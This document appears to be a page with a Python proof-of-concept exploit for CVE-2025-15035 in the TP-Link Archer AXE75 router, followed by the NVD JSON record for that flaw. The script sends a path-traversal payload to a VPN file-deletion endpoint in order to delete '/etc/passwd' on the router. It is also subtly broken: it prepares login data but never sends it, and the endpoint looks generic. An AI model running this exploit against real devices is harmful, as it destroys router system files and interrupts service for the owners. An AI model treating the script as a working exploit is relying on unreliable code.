CVE-2025-15035

# CVE-2025-15035 PoC - TP-Link Archer AXE75 VPN Module File Deletion # This PoC demonstrates the improper input validation vulnerability # Requires: Low-privilege authenticated access, Adjacent network access import requests import json TARGET_IP = "192.168.0.1" # Target router IP USERNAME = "admin" PASSWORD = "admin123" def exploit_cve_2025_15035(): """ Exploit for CVE-2025-15035: Improper Input Validation in TP-Link Archer AXE75 VPN module Allows authenticated adjacent attacker to delete arbitrary server files """ # Step 1: Authenticate with low-privilege credentials session = requests.Session() auth_url = f"http://{TARGET_IP}/login" auth_data = { "username": USERNAME, "password": PASSWORD } # Step 2: Access VPN module with malicious file path vpn_url = f"http://{TARGET_IP}/api/vpn/file/delete" # Malicious payload - Path traversal to delete arbitrary files exploit_data = { "path": "../../../../etc/passwd", # Arbitrary file path "module": "vpn" } try: # Send exploit request response = session.post(vpn_url, json=exploit_data, timeout=10) if response.status_code == 200: result = response.json() print(f"[+] Exploit sent successfully") print(f"[*] Response: {json.dumps(result, indent=2)}") return True else: print(f"[-] Exploit failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-15035 Exploit - TP-Link Archer AXE75 VPN Module") print("=" * 60) exploit_cve_2025_15035()

{"cve": {"id": "CVE-2025-15035", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-01-09T17:15:51.823", "lastModified": "2026-03-09T15:27:05.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Input Validation vulnerability in TP-Link Archer AXE75 v1.6 (vpn modules) allows an authenticated adjacent attacker to delete arbitrary server file, leading to possible loss of critical system files and service interruption or degraded functionality.This issue affects Archer AXE75 v1.6: ≤ build 20250107."}, {"lang": "es", "value": "Vulnerabilidad de validación de entrada inadecuada en TP-Link Archer AXE75 v1.6 (módulos vpn) permite a un atacante adyacente autenticado eliminar un archivo arbitrario del servidor, lo que lleva a una posible pérdida de archivos críticos del sistema e interrupción del servicio o funcionalidad degradada. Este problema afecta a Archer AXE75 v1.6: ? build 20250107."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_axe75_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.3.2", "matchCriteriaId": "7C58F321-D243-48DB-9F55-B9060416C2CF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_axe75:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "46FCDFF4-AD4F-4176-B612-83F25D3DA3AD"}]}]}], "references": [{"url": "https://github.com/PaloAltoNetworks/u42-vulnerability-disclosures/tree/master/2025/PANW-2025-0004", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Third Party Advisory"]}, {"url": "https://www.tp-link.com/en/support/download/archer-axe75/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/jp/support/download/archer-axe75/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/phppage/preview.php?url=https://www.tp-link.com/en/support/faq/4881/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}, {"url": "https://www.tp-link.com/us/support/download/archer-axe75/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}]}}